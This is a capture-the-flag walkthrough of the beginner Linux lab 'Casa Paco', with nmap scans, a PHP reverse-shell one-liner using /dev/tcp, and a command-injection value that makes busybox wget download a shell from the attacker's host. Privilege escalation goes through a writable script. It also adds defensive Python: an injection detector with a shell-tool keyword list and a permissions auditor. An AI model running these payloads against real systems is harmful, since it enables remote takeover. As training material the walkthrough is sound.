Casa Paco

Operating system: Linux
Difficulty: Beginner
Release date: 11 January 2025
Creator: Condor & CuriosidadesDeHackers

Reconnaissance

We send an ICMP echo request (ping) to the target machine to confirm that we have connectivity.

Initial enumeration

We run an nmap scan to discover which TCP ports are open on the target machine.

nmap -sS -p- --open -Pn -n --min-rate 5000 -vvv 192.168.1.7 -vvv -oG openPorts
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 20:04 -03
Initiating ARP Ping Scan at 20:04
Scanning 192.168.1.7 [1 port]
Completed ARP Ping Scan at 20:04, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:04
Scanning 192.168.1.7 [65535 ports]
Discovered open port 80/tcp on 192.168.1.7
Discovered open port 22/tcp on 192.168.1.7
Completed SYN Stealth Scan at 20:05, 36.51s elapsed (65535 total ports)
Nmap scan report for 192.168.1.7
Host is up, received arp-response (0.00078s latency).
Scanned at 2025-01-14 20:04:51 -03 for 37s
Not shown: 52473 filtered tcp ports (no-response), 13060 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:74:83:E3 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 36.68 seconds
           Raw packets sent: 124251 (5.467MB) | Rcvd: 13065 (522.604KB)

We run nmap's default enumeration scripts against the open ports to identify the service and version running behind each one.

nmap -sCV -p22,80 -oN servicesScan -vvv 192.168.1.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 20:06 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
Initiating ARP Ping Scan at 20:06
Scanning 192.168.1.7 [1 port]
Completed ARP Ping Scan at 20:06, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:06
Completed Parallel DNS resolution of 1 host. at 20:06, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:06
Scanning 192.168.1.7 [2 ports]
Discovered open port 80/tcp on 192.168.1.7
Discovered open port 22/tcp on 192.168.1.7
Completed SYN Stealth Scan at 20:06, 0.02s elapsed (2 total ports)
Initiating Service scan at 20:06
Scanning 2 services on 192.168.1.7
Completed Service scan at 20:06, 6.04s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.7.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.45s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
Nmap scan report for 192.168.1.7
Host is up, received arp-response (0.00065s latency).
Scanned at 2025-01-14 20:06:15 -03 for 6s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey: 
|   256 72:58:87:c5:87:63:3f:fa:43:da:ed:69:2f:ed:a7:d0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDeEPbzWvfbdVsbmQKgz5ST3C5xmvjfb4i4d59wj4cO2mnMZW9jciFeto0YjsabjZcqwslleYKgrCinkVK7TdFA=
|   256 13:31:bc:26:a0:2e:4a:ae:b8:31:75:7f:0e:17:32:4e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICroiKE+wS8F7kGGigBnhAMdgLUi1FftnzIIP1qHGTZF
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://casapaco.thl
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:74:83:E3 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.08 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Initial exploitation

We send ourselves a reverse shell.

index.html

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.1.15/4444 0>&1'"); ?>

We enter the following in the Plato field.

Cocido||busybox wget http://192.168.1.15/index.html -O shell.php
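
The Plato field evidently passes its value to a shell, which is why the `||` separator above turns a dish name into a command. As an added example (not code from the original writeup or from the lab), the following Python shows the two controls a defender would want: an allowlist validator to put in front of such a field, and a detector that flags submissions containing shell metacharacters or download helpers, run over constructed application log lines. The log format, the `/pedido` path and the menu contents are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed allowlist of valid dishes (assumption: the real menu is not on the page).
MENU = {"cocido", "fabada", "paella", "gazpacho"}

# Shell metacharacters that have no business in a dish name.
SHELL_META = re.compile(r"[|;&`$<>\n]")
# Download/exec helpers commonly seen in command-injection payloads.
SUSPICIOUS_WORDS = re.compile(r"\b(wget|curl|busybox|nc|bash|sh|python)\b", re.I)


def is_valid_plato(value: str) -> bool:
    """Allowlist check: only known dish names, case-insensitive, whitespace-trimmed."""
    return value.strip().lower() in MENU


def classify_submission(value: str) -> str:
    """Return 'ok', 'invalid' or 'injection' for a raw (URL-encoded) form value."""
    decoded = unquote_plus(value)
    if is_valid_plato(decoded):
        return "ok"
    if SHELL_META.search(decoded) or SUSPICIOUS_WORDS.search(decoded):
        return "injection"
    return "invalid"


# Constructed application log format: "<timestamp> <client> POST <path> plato=<raw value>".
LOG_LINE = re.compile(r"^(\S+) (\S+) POST (\S+) plato=(\S*)$")

SAMPLE_LOG = """\
2025-01-14T20:10:01 192.168.1.15 POST /pedido plato=Cocido
2025-01-14T20:10:07 192.168.1.15 POST /pedido plato=Cocido%7C%7Cbusybox+wget+http%3A%2F%2F192.168.1.15%2Findex.html+-O+shell.php
2025-01-14T20:10:12 192.168.1.20 POST /pedido plato=Tortilla
2025-01-14T20:10:15 192.168.1.20 POST /pedido plato=%24%28id%29
"""


def scan_log(text: str) -> list[tuple[str, str, str]]:
    """Return (timestamp, client, verdict) for every submission that is not 'ok'."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, client, _path, raw = m.groups()
        verdict = classify_submission(raw)
        if verdict != "ok":
            findings.append((ts, client, verdict))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the second line as an injection attempt (the page's own payload, URL-encoded), the third as merely an unknown dish, and the fourth as a `$(...)` substitution attempt.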

Privilege escalation

We see that the file fabada.sh is writable.
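
A script that a more privileged account runs but a less privileged user can edit is exactly the condition behind fabada.sh. As an added example (not part of the original writeup), this Python audit walks a directory tree and reports scripts that are group- or world-writable, or that are symlinks whose target could be swapped. The `demo()` function builds a constructed temporary directory with one safe script and one world-writable `fabada.sh`, since the machine's real paths are not given on the page.

```python
import os
import stat
import tempfile
from pathlib import Path


def writable_by_non_owner(path: Path) -> list[str]:
    """Return the reasons a file can be modified by someone other than its owner."""
    st = path.lstat()
    reasons = []
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if stat.S_ISLNK(st.st_mode):
        reasons.append("symlink")  # the target can be replaced without touching the link
    return reasons


def audit_scripts(root: Path, suffixes=(".sh", ".py", ".pl")) -> dict[str, list[str]]:
    """Walk root and map every risky script path to the reasons it is risky."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix not in suffixes:
                continue
            reasons = writable_by_non_owner(p)
            if reasons:
                findings[str(p)] = reasons
    return findings


def demo() -> dict[str, list[str]]:
    """Constructed fixture: one correctly permissioned script and one world-writable one."""
    root = Path(tempfile.mkdtemp(prefix="audit-"))
    safe = root / "menu.sh"
    safe.write_text("#!/bin/bash\necho menu\n")
    safe.chmod(0o755)
    risky = root / "fabada.sh"  # mirrors the writable script found on the machine
    risky.write_text("#!/bin/bash\necho fabada\n")
    risky.chmod(0o777)
    # Report by file name only so the random temp directory does not appear in results.
    return {Path(k).name: v for k, v in audit_scripts(root).items()}
```

In a real audit, run it against the directories referenced by cron entries, sudo rules and service units, because a writable script only matters when something privileged executes it.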

We send ourselves a reverse shell as the user pacogerente.

We listen with netcat on port 443.

nc -lnvp 443

We receive the connection.

Post-exploitation

We read the root flag.
